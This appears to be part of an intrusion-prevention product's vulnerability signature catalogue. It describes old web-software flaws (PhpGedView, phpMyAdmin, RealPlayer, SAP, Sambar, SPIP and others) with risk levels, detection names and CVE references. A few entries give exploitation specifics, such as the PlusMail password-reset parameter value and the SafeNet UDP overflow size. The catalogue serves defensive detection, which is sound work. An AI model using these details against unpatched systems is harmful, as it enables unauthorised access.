https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0031

OSVDB-3403
http://www.osvdb.org/3403

HTTP-PhpGedView-Editconfig-Gedcom-Php-Directory-Traversal

About this vulnerability:

PhpGedView's editconfig_gedcom.php contains a directory traversal vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-11-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PhpGedView

Type:

Directory Traversal

Description:

PhpGedView allows remote attackers to execute arbitrary PHP scripts or view arbitrary files by adding directory traversal sequences (../) into editconfig_gedcom.php's gedcom_config parameter.

Situation:

HTTP_CS-PhpGedView-Editconfig-Gedcom-Php-Directory-Traversal

References:

CVE-2004-0127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0127

BID-9529
http://www.securityfocus.com/bid/9529

OSVDB-3768
http://www.osvdb.org/3768

HTTP-PhpGedView-Login-Path-Disclosure

About this vulnerability:

Phpgedview displays full path in an error message

Risk:

Low

First detected in:

sgpkg-ips-12-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PhpGedView

Type:

Malfunction

Description:

PhpGedView displays the full path in an error message when login.php is requested without the required username and password parameters. The vulnerability allows remote attackers to obtain sentivive information about the system.

Situation:

HTTP_CS-PhpGedView-Login-Path-Disclosure

References:

CVE-2004-0130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0130

OSVDB-6886
http://www.osvdb.org/6886

HTTP-PhpGedView-Search-Firstname-Cross-Site

About this vulnerability:

Arbitrary HTML/script code injection via firstname parameter in phpgedview/search.php

Risk:

Moderate

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

PhpGedView

Type:

Malfunction

Description:

A cross-site scripting vulnerability exists in PhpGedView's search.php, allowing remote attackers to include arbitrary HTML or script code into the script's "firstname" parameter. This allows attackers to create links that will execute the attacker's code in the security context of the host site if the links are followed by the users.

References:

CVE-2004-0032
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0032

BID-9369
http://www.securityfocus.com/bid/9369

OSVDB-3402
http://www.osvdb.org/3402

HTTP-Phpmyadmin-Export-Php-Directory-Traversal

About this vulnerability:

PhpMyAdmin has a directory traversal vulnerability in export.php

Risk:

Low

First detected in:

sgpkg-ips-11-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

phpMyAdmin

Type:

Directory Traversal

Description:

PhpMyAdmin's export.php does not parse directory traversal sequences (../) from the what - parameter This allows remote attackers to view arbitrary files from the server.

Situation:

HTTP_CSU-Phpmyadmin-Export-Php-Directory-Traversal

References:

CVE-2004-0129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0129

BID-9564
http://www.securityfocus.com/bid/9564

OSVDB-3800
http://www.osvdb.org/3800

HTTP-Phpmyadmin-Grab-Globals-Lib-File-Disclosure

About this vulnerability:

PHPMyAdmin allows remote attackers to view files from the server

Risk:

Moderate

First detected in:

sgpkg-ips-44-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

phpMyAdmin

Type:

Malfunction

Description:

PhpMyAdmin 2.6.4-pl1 has a file disclosure vulnerability. By sending a specially-crafted HTTP request to grab_globals.lib.php, a remote attacker may read files from the host that are accessible by the web server.

Situation:

HTTP_CRL-Phpmyadmin-Grab-Globals-Lib-File-Disclosure

References:

BID-15053
http://www.securityfocus.com/bid/15053

HTTP-Plusmail-Cmd-Exec

About this vulnerability:

Command execution via plusmail CGI script

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PowerScripts PlusMail WebConsole

Type:

Malfunction

Description:

A remote attacker can change the administrative username and password of PowerScripts PlusMail Web Control Panel without knowing the current one. This is possible by passing the argument "new_login" with a value "reset password" to the /cgi-bin/plusmail script. After that the attacker can execute various privileged tasks, including changing the mailing lists, e-mail aliases, and editing the Web site.

Situation:

HTTP_CRL-Plusmail-New-Login-Attempt

References:

CVE-2000-0074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0074

BID-2653
http://www.securityfocus.com/bid/2653

HTTP-Possible-Cross-Site-Scripting

About this vulnerability:	HTTP Possible Cross Site Scripting
Risk:	Moderate
First detected in:	sgpkg-ips-477-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Cross-site Scripting
Description:	Several web applications are vulnerable to cross site scripting (XSS) attacks.
Situation:	HTTP_CSU-Script-Tag-In-URI HTTP_CSH-Suspected-Cross-Site-Scripting-Attempt HTTP_CRL-Possible-Cross-Site-Scripting-Attempt HTTP_CRL-Possible-Cross-Site-Scripting-Attempt-2 HTTP_CRL-Possible-Cross-Site-Scripting-With-JavaScript HTTP_CRL-Possible-Cross-Site-Scripting-With-Onmouseover HTTP_CRL-Possible-Cross-Site-Scripting-With-Body-Onload HTTP_CRL-Script-In-Request HTTP_CRL-Script-In-Get-Request HTTP_CRL-Possible-Script-In-Get-Request HTTP_CRL-Possible-Script-In-Request

HTTP-Publishing-Xpert-Err-Page-Path-File-Disclosure

About this vulnerability:

Publishing Xpert errPagePath File Disclosure

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Solaris

Software:

Netscape PublishingXpert

Type:

Directory Traversal

Description:

The Netscape PublishingExpert can be exploited to reveal any file on the system by specifying the file path in the errPagePath variable.

References:

CVE-2000-1196
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1196

HTTP-Py-Software-Active-Webcam-Webserver-Floppy-DoS

About this vulnerability:

PY software's Active Webcam Webserver floppy disk request DoS

Risk:

Moderate

First detected in:

sgpkg-ips-24-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

PY Software Active Webcam Webserver

Type:

Malfunction

Description:

PY Software's Active Webcam Webserver has a vulnerability that may lead to denial of service. When a request is made to a file on the floppy drive, for example a:\file.txt, the server tries to open it. If no floppy disk is present, a popup will open on the server asking for a floppy. Until the popup is closed, no other HTTP requests are processed by the server.

Situation:

HTTP_CSU-Py-Software-Active-Webcam-Webserver-Floppy-DoS

References:

CVE-2005-0730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0730

BID-12778
http://www.securityfocus.com/bid/12778

HTTP-RealPlayer-AVI-Parsing-Buffer-Overflow

About this vulnerability:

Heap based AVI parsing buffer overflow vulnerability in Realplayer

Risk:

Moderate

First detected in:

sgpkg-ips-66-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealPlayer; RealOne Player; Rhapsody

Type:

Buffer Overflow

Description:

Realplayer has a heap based AVI parsing buffer overflow vulnerability. The vulnerability can be exploited by persuading a user to open a specially crafted AVI file with a vulnerable product, causing a DoS or non-privileged arbitrary code execution.

Situation:

HTTP_RealPlayer-AVI-Parsing-Buffer-Overflow
File-RIFF_RealPlayer-AVI-Parsing-Buffer-Overflow

References:

CVE-2005-2052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2052

BID-13530
http://www.securityfocus.com/bid/13530

OSVDB-17576
http://www.osvdb.org/17576

HTTP-RealPlayer-RAM-File-Processing-Buffer-Overflow

About this vulnerability:

Heap based buffer overflow vulnerability in Realplayer

Risk:

Moderate

First detected in:

sgpkg-ips-66-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealPlayer; RealOne Player; Helix Player

Type:

Buffer Overflow

Description:

Realplayer has a heap based buffer overflow vulnerability. The vulnerability can be exploited by persuading a user to open a specially crafted RAM formatted file with a vulnerable product, causing a DoS or arbitrary code execution with the privileges of the currently logged in user.

Situation:

HTTP_RealPlayer-RAM-File-Processing-Buffer-Overflow
File-Text_RealPlayer-RAM-File-Processing-Buffer-Overflow

References:

CVE-2005-0755
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0755

BID-13264
http://www.securityfocus.com/bid/13264

OSVDB-15710
http://www.osvdb.org/15710

HTTP-RealPlayer-Realpix-And-Realtext-Format-String-Compromise

About this vulnerability:

RealPlayer Realpix and Realtext media format string compromise

Risk:

High

First detected in:

sgpkg-ips-40-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

RealPlayer; Helix Player

Type:

Format String

Description:

UNIX RealPlayer and Helix Player have a format string vulnerability in the handling of realpix and realtext files. Specially-crafted files can be used to execute arbitrary code when viewed with a vulnerable version of the players. Remote attackers can exploit the vulnerability by placing the malicious file on a webserver and tricking a victim into opening it.

Situation:

HTTP_RealPlayer-Realpix-And-Realtext-Format-String-Compromise
File-Text_RealPlayer-Realpix-And-Realtext-Format-String-Compromise

References:

CVE-2005-2710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2710

BID-14945
http://www.securityfocus.com/bid/14945

HTTP-RealPlayer-SMIL-Screen-Size-System-Compromise

About this vulnerability:

RealPlayer .SMIL screen size parameter buffer overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-29-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealPlayer; RealOne Player

Type:

Buffer Overflow

Description:

RealPlayer 10.5 and earlier have a buffer overflow vulnerability in the handling of SMIL files. A .SMIL file containing a long screen-size attribute will cause a buffer overflow allowing arbitrary code execution. The vulnerability can be exploited by remote attackers by convincing a user to open the malicious .SMIL with a vulnerable version of the software, or by tricking users to browse to a web page that contains the file. In default RealPlayer Windows installations, the Internet Explorer will open the .smil file without prompting the user.

Situation:

HTTP_RealPlayer-SMIL-Screen-Size-System-Compromise
File-TextId_RealPlayer-SMIL-Screen-Size-System-Compromise

References:

CVE-2005-0455
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0455

BID-12698
http://www.securityfocus.com/bid/12698

HTTP-Redirect-To-Non-HTTP-URI

About this vulnerability:	A HTTP redirection to a non-HTTP URI was detected
Risk:	Moderate
First detected in:	sgpkg-ips-426-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	A HTTP redirection to a non-HTTP URI was detected
Situation:	HTTP_SHS-HTTP-Redirect-To-Non-HTTP-URI

HTTP-Request-Command-Execution

About this vulnerability:	A possible attempt to run remote commands
Risk:	Moderate
First detected in:	sgpkg-ips-538-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Input Validation
Description:	A possible attempt to run remote commands
Situation:	HTTP_CSU-HTTP-Request-Command-Execution

HTTP-Request-To-0.0.0.0

About this vulnerability:	A browser security feature bypass
Risk:	Moderate
First detected in:	sgpkg-ips-1763-5242
Last changed:	sgpkg-ips-1763-5242
Platform:	Generic
Software:	Chrome; Safari; Mozilla Firefox
Type:	Malfunction
Description:	HTTP requests to address 0.0.0.0 are be able to bypass PNA (Private Network Access) restrictions on various browsers. Malicious actors can exploit this flaw to interact with services that are intended to be available only on the local network.
Situation:	File-Text_HTTP-Request-To-0.0.0.0-In-Script

HTTP-Response-Splitting-XSS

About this vulnerability:	A vulnerability in Apache Software Foundation HTTP Server
Risk:	Moderate
First detected in:	sgpkg-ips-409-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Apache2; Apache Tomcat
Type:	Cross-site Scripting
Description:	A technique has been disclosed permitting attack upon web clients via web-based applications and web caches. This technique is known as "HTTP response splitting" This vulnerability affects a wide variety of systems and software using the HTTP protocol, including most of the most widely deployed Web server software products. Once an attack has been mounted on the target successfully, the header of the response from the vulnerable target will have been split into two parts, and the second part of the legitimate header has become the content of the message body, which would be interpreted as the response to a second request by the client. The attack will have various resulting effects, depending on the attack vector: Through a cache server: a successful attack will poison the cache server, any request by a client to the legitimate target through the poisoned cache server will be responded to with malicious data. Through a malicious page: once any victim client browser visits the malicious page, an attack is mounted against the vulnerable target and the local cache of the browser is poisoned. Any further request to the legitimate target through this browser will replaced with the malicious, cached content.
Situation:	HTTP_CSU-Poison-Response-Splitting-Query

HTTP-Roads-File-Disclosure-Vulnerability

About this vulnerability:

Roads File Disclosure Vulnerability

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Martin Hamilton ROADS

Type:

Directory Traversal

Description:

Roads contains a vulnerability which allows an attacker to view arbitary files on the victim system with a specifically crafted URL.

Situation:

HTTP_CSU-Roads-File-Disclosure

References:

CVE-2001-0215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0215

BID-2371
http://www.securityfocus.com/bid/2371

HTTP-RodClark-sendform.cgi-Blurb-File-Disclosure

About this vulnerability:

File disclosure in Rod Clark's sendform.cgi.

Risk:

Low

First detected in:

sgpkg-ips-16-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Rod Clark sendform.cgi

Type:

Malfunction

Description:

Certain versions of Rod Clark's sendfrom.cgi can be tricked to disclose contents of any file the webserver has access to.

Situation:

HTTP_CRL-RodClark-sendform.cgi-Blurb-File-Disclosure

References:

CVE-2002-0710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0710

BID-5286
http://www.securityfocus.com/bid/5286

OSVDB-3568
http://www.osvdb.org/3568

HTTP-Roundup-Directory-Traversal

About this vulnerability:

Roundup allows reading arbitrary files

Risk:

Low

First detected in:

sgpkg-ips-8-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Linux

Software:

Richard Jones Roundup

Type:

Directory Traversal

Description:

Richard Jones Roundup allows remote users to access arbitrary files from the host. Remote attackers can exploit the vulnerability by sending an '@@file'

References:

CVE-2004-1444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1444

BID-10495
http://www.securityfocus.com/bid/10495

HTTP-RSA-Authentication-Agent-For-Web-Chunked-Encoding-BOF

About this vulnerability:

Buffer overflow vulnerability in RSA Authentication Agent for Web for IIS

Risk:

High

First detected in:

sgpkg-ips-200-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RSA Security RSA Authentication for Web for IIS; IIS

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in the RSA Authentication Agent for Microsoft Internet Information Server (IIS). The flaw is triggered when the vulnerable component parses crafted HTTP data. Successful exploitation can allow arbitrary code to be executed with System level privileges on the target system.

Situation:

HTTP_CCH-RSA-Authentication-Agent-For-Web-Chunked-Encoding-BOF

References:

CVE-2005-1471
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1471

BID-13524
http://www.securityfocus.com/bid/13524

HTTP-RSA-Authentication-Agent-For-Web-Redirect-BOF

About this vulnerability:

Buffer overflow vulnerability in RSA Authentication Agent for Web for IIS

Risk:

High

First detected in:

sgpkg-ips-44-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RSA Security RSA Authentication for Web for IIS; IIS

Type:

Buffer Overflow

Description:

RSA Security RSA Authentication Agent for Web for IIS has a buffer overflow vulnerability in the processing of Redirect requests. An URL variable of over 256 bytes will overflow a buffer, allowing arbitrary code execution with SYSTEM privileges. No authentication is required to exploit the vulnerability.

Situation:

HTTP_CRL-RSA-Authentication-Agent-For-Web-Redirect-BOF

References:

CVE-2005-4734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4734

BID-26424
http://www.securityfocus.com/bid/26424

OSVDB-20151
http://www.osvdb.org/20151

HTTP-Safenet-License-Manger-UDP-Buffer-Overflow

About this vulnerability:

Safenet license manager buffer overflow vulnerability

Risk:

Critical

First detected in:

sgpkg-ips-23-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SafeNet Sentinel

Type:

Buffer Overflow

Description:

The Safenet Sentinel License Manager has a buffer overflow vulnerability, which can be triggered by sending a large amount of data to the udp port 5093. To exploit the overflow around 3900 bytes of data needs to be sent. A successful exploit allows arbitrary code execution on the server.

Situation:

Generic_Safenet-License-Manager-UDP-Buffer-Overflow

References:

CVE-2005-0353
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0353

BID-12742
http://www.securityfocus.com/bid/12742

HTTP-Samba-Swat-Authentication-Base64-BOF

About this vulnerability:

Buffer overflow in Samba SWAT http authentication while decoding an invalid base64 character

Risk:

High

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1589-5242

Platform:

Linux

Software:

Samba

Type:

Buffer Overflow

Description:

Samba SWAT is vulnerable to a buffer overflow during HTTP authentication, when SWAT decodes base64 data. A remote attacker could supply an invalid base64 character, thus overflowing a buffer and possibly executing arbitrary code.

Situation:

HTTP_CS-Samba-Swat-Authentication-Base64-BOF

References:

CVE-2004-0600
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0600

BID-10780
http://www.securityfocus.com/bid/10780

HTTP-Sambar-Bat-Command-Execution-Vulnerability

About this vulnerability:

Sambar server's test .bat files allow command execution

Risk:

High

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Windows

Software:

Sambar Server

Type:

Directory Traversal

Description:

The Sambar server's default installation includes echo.bat and hello.bat in the cgi-bin/ directory. These .bat files can be used by a remote attacker to run arbitrary commands on the server.

References:

CVE-2000-0213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0213

BID-1002
http://www.securityfocus.com/bid/1002

HTTP-Sambar-Dumpenv-Pl-Information-Disclosure

About this vulnerability:

Sambar default script prints environment variables.

Risk:

Low

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Windows

Software:

Sambar Server

Type:

Insecure Configuration

Description:

The Sambar Server 4.1 beta installs by default the dumpenv.pl script, which could give remote attackers an environment list of the server.

References:

CVE-1999-1178
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1178

HTTP-Sambar-Search-DLL-Directory-Disclosure

About this vulnerability:

Sambar Search DLL Directory Disclosure

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sambar Server

Type:

Directory Traversal

Description:

The Sambar Server contains a vulnerability which can be exploited to see the contents of a directory.

Situation:

HTTP_CSU-Sambar-Search-DLL-Directory-Listing-Disclosure

References:

CVE-2000-0835
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0835

BID-1684
http://www.securityfocus.com/bid/1684

HTTP-SAP-Db-Web-Server-Buffer-Overflow-Vulnerability

About this vulnerability:

SAP DB Web Server buffer overflow vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-151-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

SAP DB

Type:

Buffer Overflow

Description:

The SAP DB Web Server (waHTTP.exe) suffers from buffer overflow vulnerabilities in the handling of specially crafted URLs. The vulnerability allows remote attackers to execute arbitrary code on a vulnerable system by sending malicious HTTP requests.

Situation:

HTTP_CRL-SAP-Db-Web-Server-Buffer-Overflow-Vulnerability
HTTP_CSU-SAP-Db-Web-Server-Buffer-Overflow-Vulnerability

References:

CVE-2007-3614
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3614

BID-24773
http://www.securityfocus.com/bid/24773

OSVDB-37838
http://www.osvdb.org/37838

HTTP-SAP-Internet-Transaction--Server-Information-Disclosure

About this vulnerability:

SAP Internet Transaction Server Information Disclosure

Risk:

Moderate

First detected in:

sgpkg-ips-343-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SAP Internet Transaction Server

Type:

Input Validation

Description:

The SAP Internet Transaction Server suffers from input validation vulnerabilities in the handling of specially crafted URLs. The vulnerability allows remote attackers to obtain potentially sensitive information such as directory structure and operating system via incorrect parameters.

Situation:

HTTP_CRL-SAP-Internet-Transaction-Server-Wgate-Information-Disclosure

References:

CVE-2003-0747
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0747

BID-8515
http://www.securityfocus.com/bid/8515

HTTP-SAP-Internet-Transaction-Server-Wgate-DLL-Arbitrary-File-Disclosure

About this vulnerability:

SAP Internet Transaction Server wgate.dll arbitrary file disclosure

Risk:

Low

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1412-5242

Platform:

Generic

Software:

SAP Internet Transaction Server

Type:

Malfunction

Description:

SAP Internet Transaction Server wgate.dll allows remote attackers to read arbitrary files from the server by sending specially crafted requests. Directory traversal sequences passed to the ~theme parameter and ~template parameter with a filename followed by space characters can lead to the server returning the selected file.

References:

CVE-2003-0748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0748

BID-8516
http://www.securityfocus.com/bid/8516

HTTP-SAP-Internet-Transaction-Server-Wgate-DLL-Cross-Site-Scripting

About this vulnerability:

SAP Internet Transaction Server wgate.dll cross site scripting vulnerability

Risk:

Low

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SAP Internet Transaction Server

Type:

Cross-site Scripting

Description:

SAP Internet Transaction Server wgate.dll allows remote attackers to insert arbitrary script code into the ~service parameter, which can be used in cross-site scripting attacks.

Situation:

HTTP_CRL-SAP-Internet-Transaction-Server-Wgate-DLL-Cross-Site-Scripting

References:

CVE-2003-0749
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0749

BID-8517
http://www.securityfocus.com/bid/8517

HTTP-SAP-Message-Srv-Server-Group-Parameter-BOF

About this vulnerability:

SAP Message Server buffer overflow vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-341-4219

Last changed:

sgpkg-ips-1589-5242

Platform:

Windows

Software:

SAP

Type:

Buffer Overflow

Description:

The SAP Message Web Server suffers from buffer overflow vulnerabilities in the handling of specially crafted URLs. The vulnerability allows remote attackers to execute arbitrary code on a vulnerable system by sending malicious HTTP requests.

Situation:

HTTP_CSU-SAP-Messenger-Web-Server-Buffer-Overflow-Vulnerability

References:

CVE-2007-3624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3624

BID-24765
http://www.securityfocus.com/bid/24765

OSVDB-38096
http://www.osvdb.org/38096

HTTP-Serendipity-Exit-Php-SQL-Injection

About this vulnerability:

Serendipity exit.php SQL injection vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-25-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

S9Y Serendipity

Type:

SQL Injection

Description:

Serendipity is a PHP based weblog/blog software. The application suffers from an SQL injection vulnerability, which allows remote attackers to do arbitrary SQL queries by including the query into exit.php's 'url_id' or 'entry_id' parameters.

Situation:

HTTP_CSU-Serendipity-Exit-Php-SQL-Injection

References:

CVE-2005-1134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1134

BID-13161
http://www.securityfocus.com/bid/13161

OSVDB-15542
http://www.osvdb.org/15542

HTTP-Sgi-Infosearch-Fname-Cmd-Exec

About this vulnerability:

Command execution using SGI CGI script infosrch.cgi

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

IRIX

Software:

SGI InfoSearch

Type:

Malfunction

Description:

The infosrch.cgi script in SGI InfoSearch package does not parse properly the user data given in the fname variable. This vulnerability gives a remote attacker an opportunity to execute commands with the Web server privileges.

Situation:

HTTP_CRL-Sgi-Cgi-Infosearch-Fname-Usage

References:

CVE-2000-0207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0207

BID-1031
http://www.securityfocus.com/bid/1031

HTTP-Sgi-IRIX-Day5datacopier-Cgi-Authentication-Bypass

About this vulnerability:

Privilege-level escalation in day5datacopier.cgi.

Risk:

High

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

IRIX

Software:

<os>

Type:

Malfunction

Description:

SGI Irix ships with the cgi script day5datacopier.cgi, which is a root-suid binary. By default it's only available to local users, but a misconfigured system or exploitation of many other security issues in Irix 6.2 may expose it to network, leading to potential remote root exploitation.

References:

CVE-1999-1232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1232

OSVDB-8559
http://www.osvdb.org/8559

HTTP-Shopper-Cgi-Directory-Traversal

About this vulnerability:

Shopper CGI Directory Traversal File Disclosure

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Web Shopper

Type:

Directory Traversal

Description:

The web shopper cgi scipt shopper.cgi does not validate the input variable newpage. An attacker could exploit this by viewing any file on the host system readable by the web servers privileges.

References:

CVE-2000-0922
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0922

BID-1776
http://www.securityfocus.com/bid/1776

HTTP-SHOUTcast-Request-Format-String-System-Compromise

About this vulnerability:

SHOUTcast server format string vulnerability

Risk:

High

First detected in:

sgpkg-ips-18-1210

Last changed:

sgpkg-ips-1637-5242

Platform:

Windows; Linux; OS X

Software:

SHOUTcast Server

Type:

Format String

Description:

Nullsoft SHOUTcast has a format strings vulnerability, that is triggered when parsing client requests for files. The vulnerability allows remote attackers to execute arbitrary code by sending a specially-crafted request to the server.

References:

CVE-2004-1373
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1373

BID-12096
http://www.securityfocus.com/bid/12096

HTTP-SimpleBBS-Name-Argument-Remote-Code-Execution

About this vulnerability:	PHP code in SimpleBBS name argument allows arbitrary php code execution
Risk:	Moderate
First detected in:	sgpkg-ips-48-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	SimpleBBS
Type:	PHP Injection
Description:	SimpleBBS, a bulleting board system by SimpleMedia, allows arbitrary php code execution. A remote attacker can send PHP code in a specially crafted format as the name of a forum user to SimpleBBS, which will cause the PHP code to be executed later when the message is viewed.
Situation:	HTTP_CRL-SimpleBBS-Name-Argument-Remote-Code-Execution

HTTP-SimplestGuest-Command-Execution

About this vulnerability:

Command-execution vulnerability in 'simplestguest.cgi'

Risk:

Moderate

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Leif M. Wright simplestguest.cgi

Type:

Malfunction

Description:

CGI script 'simplestguest.cgi' by Leif M. Wright has a vulnerability in the way it handles user-supplied input. A remote attacker is able to use this vulnerability to execute arbitrary commands via shell metacharacters on the web server.

Situation:

HTTP_CRL-SimplestGuest-Command-Execution

References:

CVE-2001-0022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0022

BID-2106
http://www.securityfocus.com/bid/2106

HTTP-SiteUserMod-Cgi-Authentication-Bypass

About this vulnerability:

Root compromise in Cobalt RaQ web administration

Risk:

Moderate

First detected in:

sgpkg-ips-12-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Linux

Software:

Cobalt RaQ

Type:

Malfunction

Description:

Any user with site administrator access is able to gain server administration privileges by changing the password of the admin account. On RaQ version 3.0, the password of any user but the admin can be changed using this technique. This is done by modifying contents of two frames of the web administration page.

References:

CVE-2000-0117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0117

BID-951
http://www.securityfocus.com/bid/951

HTTP-Snmppd-Syslog-Format-String-System-Compromise

About this vulnerability:

Snmppd arbitrary code execution with format strings

Risk:

High

First detected in:

sgpkg-ips-26-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Snmppd

Type:

Format String

Description:

Snmppd, a software designed to be a layer between the Nagios network monitoring software and SNMP agents, has a format string vulnerability in versions 0.4.5 and earlier. By sending a specially-crafted message that contains format string modifiers, remote attackers can execute arbitrary code on the server.

Situation:

SNMP-TCP_Snmppd-Syslog-Format-String-System-Compromise

References:

CVE-2005-1246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1246

BID-13348
http://www.securityfocus.com/bid/13348

HTTP-Sony-Xcp-Content-Protection-Software

About this vulnerability:	Sony XCP content protection software traffic
Risk:	Moderate
First detected in:	sgpkg-ips-47-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Sony XCP
Type:	Insecure Configuration
Description:	Sony XCP content protection software uses rootkit techniques to hide on Windows platforms. Some organizations may consider this software unwanted, and there is also malware that can use the rootkit features of the software to hide their presence.
Situation:	HTTP_CS-Sony-Xcp-Content-Protection-Software

HTTP-Sophos-Anti-Virus-CHM-File-Heap-Oveflow

About this vulnerability:

Heap overflow vulnerbility in Sophos Anti-Virus

Risk:

Moderate

First detected in:

sgpkg-ips-89-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sophos Anti-Virus

Type:

Malfunction

Description:

There is a heap overflow vulnerability in Sophos Anti-Virus. A malicious, crafted compressed help (CHM) file causes heap overflow in Sophos Anti-Virus' scanning engine. This may lead to arbitrary code execution or denial of service.

Situation:

HTTP_Sophos-Anti-Virus-CHM-File-Heap-Overflow
File-Binary_Sophos-Anti-Virus-CHM-File-Heap-Overflow

References:

CVE-2006-5646
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5646

BID-20816
http://www.securityfocus.com/bid/20816

HTTP-SPIP-RSS-Php-Globals-Type-URLs-Code-Injection

About this vulnerability:

SPIP Spip_RSS.php code injection vulnerability via GLOBALS[type_urls]

Risk:

Moderate

First detected in:

sgpkg-ips-60-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SPIP

Type:

PHP Injection

Description:

SPIP allows remote attackers to execute arbitrary commands with the web server's privileges. The script spip_access_doc.php3 can be used to inject arbitrary code into the applications log file, and another vulnerability in spip_rss.php could be exploited to include local files. These vulnerabilities can be used together to execute arbitrary commands.

Situation:

HTTP_CSU-SPIP-RSS-Php-Globals-Type-URLs-Code-Injection

References:

CVE-2006-0625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0625

BID-16556
http://www.securityfocus.com/bid/16556

